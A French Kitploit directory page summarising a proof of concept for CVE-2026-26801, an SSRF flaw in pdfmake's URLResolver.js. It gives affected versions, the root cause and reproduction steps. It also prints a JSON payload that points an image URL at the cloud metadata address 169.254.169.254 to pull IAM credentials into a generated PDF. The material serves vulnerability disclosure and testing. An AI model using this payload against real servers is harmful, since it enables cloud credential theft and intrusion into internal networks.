Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-26801-pdfmake-ssrf — PoC pour CVE-2026-26801 : SSRF dans pdfmake URLResolver.js (>= 0.3.0-beta.2, <= 0.3.5) | Kitploit
Outils/GitHubGitHub/mariopepe/cve-2026-26801-pdfmake-ssrf
Analyse des VulnérabilitésExploitationCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubmariopepe/cve-2026-26801-pdfmake-ssrf

CVE-2026-26801-pdfmake-ssrf

PoC pour CVE-2026-26801 : SSRF dans pdfmake URLResolver.js (>= 0.3.0-beta.2, <= 0.3.5)

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC de la vulnérabilité SSRF dans pdfmake

Résumé de la vulnérabilité

ChampValeur
Paquetpdfmake
Version>= 0.3.0-beta.2, <= 0.3.5
Corrigé0.3.6
CVECVE-2026-26801
TypeServer-Side Request Forgery (SSRF)
Emplacementsrc/URLResolver.js
SévéritéÉLEVÉE

Cause racine

root@kitploit:~
// URLResolver.js line 3
const response = await fetch(url, { headers });  // NO VALIDATION!

Lorsque docDefinition contient des URL dans images, attachments ou files, pdfmake les récupère sans aucune validation :

  • Aucune liste blanche/noire pour les domaines
  • Aucune protection contre les IP internes (127.0.0.1, 169.254.169.254, 10.x.x.x)
  • En-têtes personnalisés pris en charge (permet le contournement de l'authentification)

Reproduction

Configuration

root@kitploit:~
npm install

Terminal 1 - Serveur AWS Metadata simulé

root@kitploit:~
npm run metadata

Terminal 2 - Serveur PDF vulnérable

root@kitploit:~
npm run server

Terminal 3 - Exécution de l'attaque

SSRF aveugle (prouve que le serveur effectue des requêtes sortantes) :

root@kitploit:~
npm run attack

SSRF avec lecture complète (identifiants intégrés dans le PDF généré) :

root@kitploit:~
npm run exfiltrate

Résultats attendus

SSRF aveugle (npm run attack)

Sortie du serveur Metadata :

root@kitploit:~
[METADATA] GET /latest/meta-data/iam/security-credentials/vulnerable-ec2-role
[METADATA] >>> CREDENTIALS LEAKED! <<<

Cela prouve que le serveur vulnérable a effectué une requête sortante vers notre point de terminaison contrôlé.

SSRF avec lecture complète (npm run exfiltrate)

Le script d'attaque génère exfiltrated.pdf. Ouvrez-le dans n'importe quel lecteur PDF et le JSON des identifiants AWS est intégré en tant que pièce jointe (metadata.json). Cela prouve une exfiltration complète des données, et non pas seulement une SSRF aveugle. L'attaquant récupère le corps de la réponse réel à l'intérieur du PDF.

Impact dans le monde réel

  1. Vol d'identifiants AWS/GCP/Azure - Accès aux points de terminaison de métadonnées cloud
  2. Accès au réseau interne - Atteindre les services internes
  3. Scan de ports - Énumérer l'infrastructure interne
  4. Contournement d'authentification - En-têtes personnalisés pour contourner l'authentification

Charge utile de l'attaque

root@kitploit:~
{
  "content": ["Hello"],
  "images": {
    "x": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
  }
}

Analyse technique

Analyse technique complète avec l'histoire de la découverte, la chaîne d'attaque et la chronologie de divulgation : mariopepe.github.io/cve-2026-26801-pdfmake-ssrf

Télécharger l’outil